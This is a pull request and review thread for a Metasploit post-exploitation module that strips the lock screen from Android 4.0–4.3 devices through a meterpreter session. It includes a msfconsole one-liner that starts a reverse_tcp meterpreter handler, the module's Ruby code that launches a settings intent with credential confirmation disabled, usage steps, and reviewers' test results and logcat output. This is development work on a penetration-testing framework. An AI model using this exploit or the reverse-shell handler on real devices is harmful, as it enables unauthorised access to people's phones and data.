### PR TITLE
Add Android 4.x remove lockscreen (without root)

### PR DESCRIPTION
**Pull request by timwr**
This module adds an exploit that removes the device lock on Android 4.x (fixed in 4.4):
You will need a handler and an android 4.0 -> 4.3 device or emulator attached with adb:
- [x] `LHOST=$(hostname -I); ./msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"`
- [x] use the module

```
use post/android/manage/remove_lock.rb
set session 1
exploit
```
- [x] If the lock screen is currently active, any gesture/key should be valid to unlock the device.
- [x] If the phone screen is locked, it should now just be slide to unlock.

### CODE REVIEW

File: modules/post/android/manage/remove_lock.rb [hunk 1]
```diff
@@ -0,0 +1,53 @@
...
+  end
+
+  def run
+    buildprop = cmd_exec('cat /system/build.prop')
+    unless buildprop =~ /ro.build.version.release=4.[0|1|2|3]/
+      print_error("This module is only compatible with Android versions 4.0 to 4.3")
+      return
+    end
+
+    cmd_exec('am start -n com.android.settings/com.android.settings.ChooseLockGeneric --ez confirm_credentials false --ei lockscreen.password_type 0 --activity-clear-task')
```
Comment (hmoore-r7) [inline modules/post/android/manage/remove_lock.rb]: This should tell the user what happened (or otherwise let them know the command succeeded/failed).

**Comment by joevennix** [comment]
I can't seem to get this to work for me @timwr; the output tells me "Intent started, the lock screen should now have been removed", but the lockscreen is still there.

I am testing on the genymotion image "Google Nexus 7 - 4.3 - API 18".

**Comment by joevennix** [comment]
I also get a suspicious error when the session begins:

     [-] Failed to load extension: No module of the name ext_server_android.jar found

Not sure why that is happening. I installed the apk manually with adb.

**Comment by timwr** [comment]
Hi @joevennix, thanks for testing. It's working on genymotion  "Google Nexus 4 - 4.1.1 - API 16" , but not "Google Nexus 4 - 4.2.2 - API 17 - 768x1280". It looks like while 4.2-4.3 is vulnerable, the am executable only works on from the "adb shell" user, and not via stdapi_sys_process_execute e.g:
```
D/AndroidRuntime( 2058): Calling main entry com.android.commands.am.Am
D/dalvikvm( 2058): Note: class Landroid/app/ActivityManagerNative; has 157 unimplemented (abstract) methods
W/ActivityManager(  406): Permission Denial: startActivity asks to run as user -2 but is calling from user 0; this requires android.permission.INTERACT_ACROSS_USERS_FULL
I/AndroidRuntime( 2058): VM exiting with result code 1.
```
I think I'll have to re-write this to be part of meterpreter, e.g:
https://github.com/curesec/android/blob/master/CRT-RemoveLocks/src/com/curesec/android/RemoveLocks.java#L20

**Comment by joevennix** [comment]
@timwr gotcha. A meterpreter command "unlock_screen" that only shows up on applicable devices would be just as handy as a post module I think.

**Comment by wchen-r7** [comment]
Ok this works for me for sure.

However, I notice that quite often ```cmd_exec('cat /system/build.prop')``` fails... as in it returns an empty string instead of the settings. @timwr have you noticed this, too? I think I kind of have to run the module 5 or 6 times to finally get it to work.

**Pull request merged**